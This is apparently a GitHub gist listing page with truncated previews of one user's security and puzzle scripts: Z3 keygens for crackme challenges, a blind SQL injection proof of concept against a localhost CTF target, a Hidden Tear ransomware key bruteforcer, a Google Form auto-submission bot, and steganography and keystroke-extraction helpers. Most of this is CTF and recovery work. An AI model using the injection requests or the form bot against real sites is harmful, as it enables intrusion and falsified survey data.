

from z3 import *
from struct import pack
# define vars
# Number of symbolic 16-bit cells in the buffer being solved for.
LENGTH = 8
# Debug toggle (0 = off); the code that reads it is further down the script, not shown here.
DEBUG = 0
# One 16-bit symbolic variable per buffer position, named "0".."7" after its index.
Buf = [BitVec("%i" % i, 16) for i in range(LENGTH)]
# Constraints on Buf are added to this solver below.
solver = Solver()
solver.add(
mokhdzanifaeq / poc.py
Created Dec 11, 2018
blind SQL injection
import requests
# Hex-literal prefix; presumably prepended to recovered bytes — the code that uses it is cut off here, confirm.
tmp = '0x'
# Accumulates the value recovered so far; how it is filled is in the part of the script not shown here.
flag = ''
# Candidate length probed by the loop below, starting from 1.
length = 1
# get flag length
while True:
r = requests.get('http://localhost/post.php?id=length(@bounty)-{}'.format(length - 1))
if '1337' in r.content: break
mokhdzanifaeq / brute.py
Last active Nov 26, 2018
multithreaded Hidden Tear bruteforcer: starts from the defined tick and decreases from there
# pip install pycryptodome
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Cipher import AES
from hashlib import sha256
from datetime import datetime
from ctypes import *
import multiprocessing as mp
# http://referencesource.microsoft.com/#mscorlib/system/random.cs
class Random(object):
mokhdzanifaeq / bot.py
Created Feb 12, 2018
Google Form bot with weighted answers
import os,sys
import requests
import re
import ast
import json
import time
from numpy.random import choice
# Iteration count; presumably the number of submissions the loop further down performs — that loop is cut off here, confirm.
loop = 102
mokhdzanifaeq / regex.py
Last active Jun 12, 2017
satisfying a regular expression using an SMT solver
import re
import sys
import string
from z3 import *
# hackish way to generate a string that satisfies a simple regex
# not supported: group references & lookbehind
# usage: python regex.py PATTERN LENGTH
# Regex pattern to satisfy, taken from argv[1]; per the usage line above, argv[2] carries the target
# length and is read further down (not shown here). Raises IndexError if the argument is missing.
pattern = sys.argv[1]
mokhdzanifaeq / extract.py
Last active Apr 21, 2017
extract data embedded in pixel channels
from PIL import Image
import argparse
from collections import OrderedDict
def parseMask(string):
mask = []
for val in string.split(","):
if "-" in val:
min, max = val.split("-")
mask += [1 << (i - 1) for i in range(int(min), int(max) + 1)]
mokhdzanifaeq / extract.rb
Created Nov 23, 2016
extract keystrokes from buffer data [Metasploit]
// extracted from metasploit source code
// need to get hex stream of the buffer
VirtualKeyCodes = {
1 => %W{ LClick },
2 => %W{ RClick },
3 => %W{ Cancel },
4 => %W{ MClick },
8 => %W{ Back },
9 => %W{ Tab },
mokhdzanifaeq / keygen.py
Last active Apr 13, 2016
keygen for challenge4_ok using the Z3 theorem prover
# challenge4_ok.exe - https://drive.google.com/open?id=0B_bQeUUGe4uLcXNqRnBBand5Yk0
from z3 import *
import sys
# argv[1] == key length
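# Key length requested on the command line (argv[1]). A missing or non-numeric
# argument and any length below 5 are rejected before solving starts.
# sys.exit(1) is used instead of the bare exit() builtin: exit() is only
# installed by the site module, and a rejected argument should yield a
# non-zero status so callers can tell the keygen did not run.
if len(sys.argv) < 2:
    print("usage: keygen.py KEY_LENGTH")
    sys.exit(1)
try:
    length = int(sys.argv[1])
except ValueError:
    print("length must be an integer!")
    sys.exit(1)
if length < 5:
    print("length must be more than 4!")
    sys.exit(1)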
mokhdzanifaeq / keygen.py
Last active Mar 27, 2016
keygen for challenge3
# challenge3 - https://drive.google.com/file/d/0B_bQeUUGe4uLM3BWd1dqTVF4TVE/view?usp=sharing
from z3 import *
import sys
# define the variables
# Seven integer symbolic variables with an empty name prefix — presumably one per key character, confirm against the constraints below.
chars = IntVector("", 7)
# Solver that will receive the constraints collected below.
solver = Solver()
# Constraints are accumulated here before being handed to the solver; the code that fills
# and adds them is further down, not shown here.
constraint = []
from z3 import *
from random import shuffle
# define the variables
# Sixteen integer symbolic variables with an empty name prefix; per the comment below,
# the loop that follows constrains each to a printable character code (33-126).
chars = IntVector("", 16)
# Solver that collects the constraints added below.
solver = Solver()
# all values are printable characters (33 - 126)
for i in range(16):